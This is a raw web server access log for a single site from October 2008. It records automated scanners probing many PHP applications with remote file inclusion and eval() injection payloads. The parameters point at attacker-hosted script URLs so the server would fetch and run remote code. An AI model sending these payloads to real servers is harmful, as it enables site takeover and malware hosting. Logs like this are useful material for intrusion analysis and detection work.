81.208.30.57 - - [26/Oct/2008:17:00:23 -0700] "GET /logs/access_080811.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.208.30.57 - - [26/Oct/2008:17:00:40 -0700] "GET /logs/access_080811.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:00:43 -0700] "GET /index.php?DOCUMENT_ROOT=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:00:44 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.vspeaking.com"
200.215.80.179 - - [26/Oct/2008:17:01:08 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
200.215.80.179 - - [26/Oct/2008:17:01:08 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
200.215.80.179 - - [26/Oct/2008:17:01:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:03:35 -0700] "GET /logs/access_080811.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
65.55.209.2 - - [26/Oct/2008:17:04:01 -0700] "GET /logs/?D=D HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:33 -0700] "GET /logs/access_080804.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:33 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:33 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:35 -0700] "GET /logs/access_080804.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:35 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:05:35 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:06:50 -0700] "GET /logs/access_080818.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
218.38.12.178 - - [26/Oct/2008:17:06:55 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
218.38.12.178 - - [26/Oct/2008:17:09:01 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.70.48.67 - - [26/Oct/2008:17:09:19 -0700] "GET /logs/access.log/errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.69.95.162 - - [26/Oct/2008:17:12:59 -0700] "GET /logs/access_080804.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://afronet.net/webcalender//tools/greper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
78.111.80.12 - - [26/Oct/2008:17:15:02 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),50(ftp),100(users)%20context=system_u:system_r:initrc_t%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [26/Oct/2008:17:15:57 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),50(ftp),100(users)%20context=system_u:system_r:initrc_t%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
218.234.19.139 - - [26/Oct/2008:17:20:46 -0700] "GET /logs/access_080901.log//mambots/content/multithumb/errors.php?error=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.246.187.54 - - [26/Oct/2008:17:21:33 -0700] "GET /logs/access_080901.log//mambots/content/multithumb/errors.php?error=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.85.192.194 - - [26/Oct/2008:17:23:37 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:17:24:39 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:17:24:39 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:17:24:39 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:25:08 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:25:08 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:25:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:27:27 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:27:28 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:27:30 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.55.209.8 - - [26/Oct/2008:17:28:36 -0700] "GET /logs/access_080915.log HTTP/1.1" 200 65536 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:29:05 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:29:06 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:17:29:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.249.108.100 - - [26/Oct/2008:17:29:37 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:30:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:30:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:30:33 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
121.149.134.114 - - [26/Oct/2008:17:31:37 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:32:52 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:32:52 -0700] "GET /logs/access_080804.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:32:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:17:33:37 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:33:42 -0700] "GET /logs/access.log/?sourcedir=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:33:42 -0700] "GET /?sourcedir=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:33:44 -0700] "GET /logs/access_080804.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:33:44 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:17:33:44 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:33:54 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:33:56 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:33:56 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:17:33:57 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:17:33:57 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:34:38 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:34:38 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:34:38 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
193.255.140.22 - - [26/Oct/2008:17:35:48 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.186.15.66 - - [26/Oct/2008:17:37:12 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.shackletoncredit.co.za/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.vspeaking.com"
91.186.15.66 - - [26/Oct/2008:17:37:12 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.shackletoncredit.co.za/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:40:04 -0700] "GET /logs/access.log/?sourcedir=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:40:04 -0700] "GET /?sourcedir=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:40:05 -0700] "GET /logs/?sourcedir=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 200 2368 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:40:06 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
70.85.192.194 - - [26/Oct/2008:17:41:16 -0700] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.85.192.194 - - [26/Oct/2008:17:41:16 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:17:42:01 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:17:42:01 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:17:42:01 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:17:42:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dti.gov.ph/iiddss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
58.141.74.8 - - [26/Oct/2008:17:42:53 -0700] "GET /logs/access_080707.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
91.206.27.125 - - [26/Oct/2008:17:47:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://80.238.93.32/~azun/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
91.206.27.125 - - [26/Oct/2008:17:47:02 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://80.238.93.32/~azun/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
91.206.27.125 - - [26/Oct/2008:17:47:02 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://80.238.93.32/~azun/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
91.206.27.125 - - [26/Oct/2008:17:49:10 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://80.238.93.32/~azun/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:53:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:53:55 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:53:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:15 -0700] "GET /logs/access_080707.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:15 -0700] "GET /main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:15 -0700] "GET /logs//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:16 -0700] "GET /logs/access_080707.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:16 -0700] "GET /main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:16 -0700] "GET /logs//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:39 -0700] "GET /logs/access_080804.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:17:55:41 -0700] "GET /logs/access_080804.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:17:56:47 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:57:47 -0700] "GET /logs/access_080707.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:57:47 -0700] "GET /main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:57:48 -0700] "GET /logs//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
64.235.253.1 - - [26/Oct/2008:17:58:05 -0700] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jockey.mn/images/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:17:58:26 -0700] "GET /logs/access_080804.log//main.php?sayfa=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:17:58:57 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dti.gov.ph/iiddss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:17:59:01 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:17:59:01 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
190.7.196.100 - - [26/Oct/2008:17:59:01 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
189.59.236.132 - - [26/Oct/2008:18:01:18 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
189.59.236.132 - - [26/Oct/2008:18:01:18 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
189.59.236.132 - - [26/Oct/2008:18:01:18 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
69.248.147.137 - - [26/Oct/2008:18:03:38 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
